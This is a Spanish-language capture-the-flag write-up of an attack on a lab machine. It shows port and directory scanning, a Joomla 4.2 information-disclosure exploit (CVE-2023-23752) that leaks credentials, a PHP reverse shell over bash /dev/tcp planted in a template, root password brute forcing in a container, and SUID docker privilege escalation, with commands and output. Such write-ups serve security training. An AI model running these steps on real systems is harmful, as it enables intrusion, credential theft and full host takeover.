Enumeramos puertos y directorios:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.56❯ nmap -sCV -p 22,80,8080 -oN 02-targeted.txt 192.168.1.56
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-14 15:15 -03
Nmap scan report for 192.168.1.56
Host is up (0.00030s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp open http nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: Welcome to nginx!
8080/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
| http-robots.txt: 16 disallowed entries (15 shown)
| /joomla/administrator/ /administrator/ /api/ /bin/
| /cache/ /cli/ /components/ /includes/ /installation/
|_/language/ /layouts/ /libraries/ /logs/ /modules/ /plugins/
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Welcome to nginx!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.28 seconds❯ gobuster dir -u 'http://192.168.1.56:8080' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,sql,png,xml,zip,sh,db -r
...
/index.php (Status: 200) [Size: 614]
/images (Status: 200) [Size: 31]
/home (Status: 200) [Size: 614]
/media (Status: 200) [Size: 31]
/templates (Status: 200) [Size: 31]
/modules (Status: 200) [Size: 31]
/plugins (Status: 200) [Size: 31]
/includes (Status: 200) [Size: 31]
/language (Status: 200) [Size: 31]
/README.txt (Status: 200) [Size: 4942]
/components (Status: 200) [Size: 31]
/api (Status: 406) [Size: 29]
/cache (Status: 200) [Size: 31]
/libraries (Status: 403) [Size: 279]
/robots.txt (Status: 200) [Size: 764]
/tmp (Status: 200) [Size: 31]
/LICENSE.txt (Status: 200) [Size: 18092]
/layouts (Status: 200) [Size: 31]
/administrator (Status: 200) [Size: 12277]
...El README.txt revela que corre Joomla 4.2, vulnerable a una divulgación de información no autenticada (CVE-2023-23752). Lanzamos el exploit, que filtra las credenciales del administrador y de la base de datos:
❯ searchsploit joomla 4.2
...
Joomla! v4.2.8 - Unauthenticated information disclosure | php/webapps/51334.py
...
❯ ./51334.rb http://192.168.1.56:8080
Users
[853] administrator (admin) - admin@mail.nyx - Super Users
Site info
Site name: Joomla
Editor: tinymce
Captcha: 0
Access: 1
Debug status: false
Database info
DB type: mysqli
DB host: mysql
DB user: root
DB password: j00mL@123###
DB name: joomla_db
DB prefix: o574c_
DB encryption 0Iniciamos sesión en /administrator/ con admin:j00mL@123###, editamos el index.php de una plantilla añadiendo una reverse shell y la disparamos:
<?php
shell_exec("bash -c 'bash -i >& /dev/tcp/192.168.1.7/1234 0>&1'");
?>
❯ ncat -nlvp 1234
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.56:33162.
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@640aa6d0dea4:/var/www/html$El hostname y el sistema de archivos indican que estamos dentro de un contenedor Docker. Para escalar dentro del contenedor, hacemos fuerza bruta sobre la contraseña de root con su-bruteforce:
www-data@640aa6d0dea4:/tmp$ ./suBF.sh -u root -t 0.7 -s 0.05
[+] Bruteforcing root...
You can login as root using password: fucker
www-data@640aa6d0dea4:/var/www/html$ su root
su root
Password: fucker
root@640aa6d0dea4:/var/www/html#Dentro del contenedor obtenemos la clave id_rsa del usuario joel, con la que accedemos al host real y obtenemos la primera flag:
❯ ssh joel@192.168.1.56 -i id_rsa_joel
joel@service:~$Para escalar privilegios en el host, buscamos binarios SUID y encontramos docker:
joel@service:/tmp$ find / -perm -4000 2>/dev/null
...
/usr/bin/docker
...Con docker SUID, montamos el sistema de archivos del host en un contenedor y obtenemos root:
joel@service:/tmp$ docker run -v /:/mnt --rm -it alpine chroot /mnt bash
root@c0dbbef5307a:/#Obtenemos la flag y fin.